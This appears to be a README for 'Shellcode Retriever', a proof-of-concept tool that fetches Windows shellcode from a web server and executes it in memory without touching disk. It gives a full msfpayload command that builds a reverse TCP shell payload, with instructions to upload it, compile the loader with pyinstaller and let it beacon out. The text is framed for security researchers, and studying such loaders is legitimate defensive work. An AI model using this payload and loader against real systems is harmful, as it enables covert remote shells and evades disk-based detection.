Shellcode Retriever – POC of code that downloads and executes shellcode in memory.

Shellcode Retriever

Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)

Demo:

http://www.youtube.com/watch?v=R15B2p-uWKY

---

For use by IT Security professionals and researchers.

Usage:

Create shellcode using the following msfpayload command:

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt

Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.

Upload the shellcode to your webserver.

Compile the python code to an executeable by using pyinstaller.

More info can be found on: https://github.com/secretsquirrel/shellcode_retriever